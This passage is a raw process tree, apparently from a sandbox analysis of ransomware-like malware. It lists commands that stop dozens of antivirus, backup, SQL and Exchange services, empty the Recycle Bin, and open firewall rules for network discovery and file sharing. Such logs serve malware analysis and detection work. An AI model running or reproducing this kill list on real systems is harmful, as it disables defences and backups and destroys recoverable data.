  PID:1032
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1512
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1836
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1052
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1724
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:608
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:864
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1148
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:516
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1404
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:1692
- C:\Windows\system32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:1668
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:2016
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:2020
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:1048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:1484
- C:\Windows\system32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:1612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:984
- C:\Windows\system32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:2032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:1284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:4248
- C:\Windows\system32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:1316
- C:\Windows\system32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:3040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:3888
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:2060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:5512
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFramework /y
  2⤵
  PID:2012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:5496
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper100 /y
  2⤵
  PID:2096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    3⤵
    PID:3880
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeEngineService /y
  2⤵
  PID:2116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:3356
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:2076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:4000
- C:\Windows\system32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:3264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:5132
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:3256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:2692
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:3248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:5556
- C:\Windows\system32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:3240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:6368
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:3232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:5580
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:3224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:5404
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:3208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:5104
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:3200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:3032
- C:\Windows\system32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:3192
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:6384
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:5564
- C:\Windows\system32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:3176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:6596
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:6428
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Health Service” /y
  2⤵
  PID:3160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Health Service” /y
    3⤵
    PID:5292
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSRS /y
  2⤵
  PID:3152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:6404
- C:\Windows\system32\net.exe
  "net.exe" stop W3Svc /y
  2⤵
  PID:3144
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:2464
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:3136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:5628
- C:\Windows\system32\net.exe
  "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2⤵
  PID:3128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:5820
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPS /y
  2⤵
  PID:3120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:5348
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos File Scanner Service” /y
  2⤵
  PID:3112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    3⤵
    PID:5764
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeSA /y
  2⤵
  PID:3104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:1624
- C:\Windows\system32\net.exe
  "net.exe" stop UI0Detect /y
  2⤵
  PID:3096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:6376
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:3088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:5500
- C:\Windows\system32\net.exe
  "net.exe" stop “Symantec System Recovery” /y
  2⤵
  PID:3080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Symantec System Recovery” /y
    3⤵
    PID:5848
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:2432
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Device Control Service” /y
  2⤵
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
    3⤵
    PID:756
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:2412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:2928
- C:\Windows\system32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:2388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SstpSvc /y
    3⤵
    PID:5072
- C:\Windows\system32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:2340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:5716
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:2524
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:2756
- C:\Windows\system32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:2528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:2780
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:2152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Clean Service” /y
    3⤵
    PID:2828
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:2436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMGMT /y
    3⤵
    PID:2768
- C:\Windows\system32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:2472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop POP3Svc /y
    3⤵
    PID:4032
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:2236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer110 /y
    3⤵
    PID:6396
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:2180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
    3⤵
    PID:4600
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:2368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:5992
- C:\Windows\system32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SamSs /y
    3⤵
    PID:2872
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:2400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:960
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:2240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    3⤵
    PID:4008
- C:\Windows\system32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:2128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetMsmqActivator /y
    3⤵
    PID:4080
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:756
- C:\Windows\system32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:2132
- C:\Windows\system32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:2352
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Enterprise Client Service” /y
    3⤵
    PID:5456
- C:\Windows\system32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:5768
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:2112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Agent” /y
    3⤵
    PID:5316
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:5548
- C:\Windows\system32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:2160
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:2328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:3928
- C:\Windows\system32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:2336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    3⤵
    PID:6444
- C:\Windows\system32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:2360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:2884
- C:\Windows\system32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:1984
- C:\Windows\system32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:1816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:2224
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:2196
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:6412
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:3720
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:2156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:4064
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:2232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:5088
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:2100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:5504
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:2080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:4704
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:2092
- C:\Windows\system32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:2064
- C:\Windows\system32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:1016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:2212
- C:\Windows\system32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:2260
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:1032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:5168
- C:\Windows\system32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:1724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:5908
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:5360
- C:\Windows\system32\net.exe
  "net.exe" stop wbengine /y
  2⤵
  PID:1512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:3832
- C:\Windows\system32\net.exe
  "net.exe" stop mfefire /y
  2⤵
  PID:516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:3992
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:1148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:4460
- C:\Windows\system32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:1284
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:900
- C:\Windows\system32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:2120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:2812
- C:\Windows\system32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:1260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:5528
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5608
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamMountSvc /y
  2⤵
  PID:940
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:2088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:5488
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:1840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:3824
- C:\Windows\system32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:3068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:3856
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:3056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:3968
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:3048
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:2780
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:1152
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:3772
- C:\Windows\system32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:3008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:3476
- C:\Windows\system32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:3000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:2760
- C:\Windows\system32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:4072
- C:\Windows\system32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:2984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:4040
- C:\Windows\system32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:2976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:1548
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:2752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:4080
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:2744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:3444
- C:\Windows\system32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:2736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:2492
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:2728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:3460
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:2720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:2548
- C:\Windows\system32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:2712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:2468
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:2696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:3412
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:2688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:2556
- C:\Windows\system32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:2680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:2444
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:2672
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:2244
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:2664
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:3580
- C:\Windows\system32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:2656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:836
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:2648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:2532
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:2640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:396
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:2632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:3420
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:2624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:2408
- C:\Windows\system32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:2616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:5268
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:2608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:864
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:2600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:5588
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:2592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:3452
- C:\Windows\system32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:2584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:3388
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:2576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:5064
- C:\Windows\system32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:2568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:6436
- C:\Windows\system32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:2560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:1148
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5620
- C:\Windows\system32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2488
- C:\Windows\system32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:2456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:6180
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:2440
- C:\Windows\system32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2404
- C:\Windows\system32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:2384
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:2304
- C:\Windows\system32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:2188
- C:\Windows\system32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2176
- C:\Windows\system32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2148
- C:\Windows\system32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:2124
- C:\Windows\system32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:2108
- C:\Windows\system32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:4032
- C:\Windows\system32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1904
- C:\Windows\system32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:948
- C:\Windows\system32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:1016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:3904
- C:\Windows\system32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:1816
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:1784
- C:\Windows\system32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:820
- C:\Windows\system32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:840
- C:\Windows\system32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:1548
- C:\Windows\system32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:1820
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerOLAPService /y
  2⤵
  PID:3324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    3⤵
    PID:3448
- C:\Windows\system32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:1360
- - C:\Windows\system32\net1.exe
